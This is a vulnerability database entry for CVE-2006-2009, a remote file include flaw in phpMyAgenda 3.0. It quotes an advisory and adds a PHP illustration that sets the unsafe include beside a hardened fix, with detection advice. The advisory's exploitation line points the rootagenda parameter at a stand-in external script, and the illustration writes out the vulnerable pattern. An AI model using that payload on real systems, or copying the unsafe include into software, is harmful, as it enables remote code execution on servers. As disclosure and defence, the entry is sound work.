PHPMyAgenda agenda.php3 Remote File Include Vulnerability

Vulnerability ID 1195223 Vulnerability type Input validation
Published 2006-04-25 Updated 2006-04-26
CVE number CVE-2006-2009 CNNVD ID CNNVD-200604-478
Vulnerable platform N/A CVSS score 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006040108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-478
|Vulnerability details
agenda.php3 in phpMyAgenda 3.0 Final and earlier contains a PHP remote file include vulnerability. It allows remote attackers to execute arbitrary PHP code via a URL in the rootagenda parameter.
|Vulnerability EXP
[MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability 
--------------------------------------------------------
Software: phpMyAgenda
Version: 3.0 Final
Type: Remote File Include Vulnerability
Date: April, 24th 2006
Vendor: phpMyAgenda
Page: http://phpmyagenda.com
Risk: High

Credits:
----------------------------
Discovered by: 'Aesthetico'
http://www.majorsecurity.de

Affected Products:
----------------------------
phpMyAgenda 3.0 Final and prior

Description:
----------------------------
phpMyAgenda is a complete web application that allows you to manage 
and publish events (concerts, meetings, etc.).
It stores description, dates, places, contacts, event registrations, and event polls.

Requirements:
----------------------------
register_globals = On

Vulnerability:
----------------------------
Input passed to the "rootagenda" parameter in "agenda.php3" is not
properly verified before it is used to include files. 
This can be exploited to execute arbitrary code by including files from external resources.

Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.

Set "register_globals" to "Off".

Exploitation:
----------------------------
Post data:
rootagenda=http://www.yourspace.com/yourscript.php?
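The following is an added illustration, not phpMyAgenda's own code: the include pattern the advisory describes (a request-controlled variable used as an include prefix) beside a hardened replacement. `$rootagenda`, `functions.php`, the theme allowlist and `AGENDA_ROOT` are assumptions made for the example.

```php
<?php
// Added example (not phpMyAgenda's code). Names such as $rootagenda,
// functions.php and the theme allowlist are illustrative assumptions.

// UNSAFE PATTERN: with register_globals=On, $rootagenda is silently filled
// from GET/POST/cookie data. Remote include support (allow_url_fopen on
// PHP 4/5.1, allow_url_include on PHP 5.2+) then lets a URL become the
// include source, so code fetched from elsewhere runs on the server.
function include_unsafe()
{
    global $rootagenda;                      // request-controlled when register_globals=On
    include $rootagenda . '/functions.php';  // no validation before use
}

// HARDENED: the include base is derived from the script's own location at
// load time; nothing taken from the request contributes to the path.
define('AGENDA_ROOT', realpath(__DIR__));

function include_safe()
{
    require_once AGENDA_ROOT . '/functions.php';
}

// When a request really must choose a file (a theme, a language pack), map
// the value against a fixed allowlist and confirm the resolved path is still
// inside AGENDA_ROOT. Anything else is rejected rather than included.
function resolve_include(string $name): ?string
{
    $allowed = ['default', 'compact'];       // illustrative allowlist
    if (!in_array($name, $allowed, true)) {
        return null;
    }
    $path = realpath(AGENDA_ROOT . '/themes/' . $name . '.php');
    if ($path === false || strpos($path, AGENDA_ROOT . DIRECTORY_SEPARATOR) !== 0) {
        return null;                         // missing, or escaped the base directory
    }
    return $path;
}

// Defence in depth (php.ini): register_globals=Off stops request data from
// becoming variables; allow_url_include=Off (and allow_url_fopen=Off where
// the application permits) stops include/require from reaching remote URLs.
```

Detection on a deployed instance: requests whose rootagenda value begins with a URL scheme (http://, https://, ftp://) in the web server access log are a direct indicator of attempts against this class of flaw.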
|References

Source: BID
Name: 17670
Link: http://www.securityfocus.com/bid/17670
Source: BUGTRAQ
Name: 20060424 [MajorSecurity] phpMyAgenda 3.0 Final - Remote File Include Vulnerability
Link: http://www.securityfocus.com/archive/1/archive/1/431862/100/0/threaded
Source: MISC
Link: http://downloads.securityfocus.com/vulnerabilities/exploits/phpMyAgenda_fi.txt
Source: XF
Name: phpmyagenda-rootagenda-file-include(26062)
Link: http://xforce.iss.net/xforce/xfdb/26062
Source: BUGTRAQ
Name: 20060515 tyree[at]users.sourceforge.net
Link: http://www.securityfocus.com/archive/1/archive/1/433995/100/0/threaded
Source: OSVDB
Name: 24943
Link: http://www.osvdb.org/24943
Source: VUPEN
Name: ADV-2006-1509
Link: http://www.frsirt.com/english/advisories/2006/1509
Source: SECTRACK
Name: 1015984
Link: http://securitytracker.com/id?1015984
Source: SREASON
Name: 787
Link: http://securityreason.com/securityalert/787
Source: SECUNIA
Name: 19748
Link: http://secunia.com/advisories/19748
Source: MISC
Link: http://osvdb.org/ref/29/2914x-phpmyagenda.txt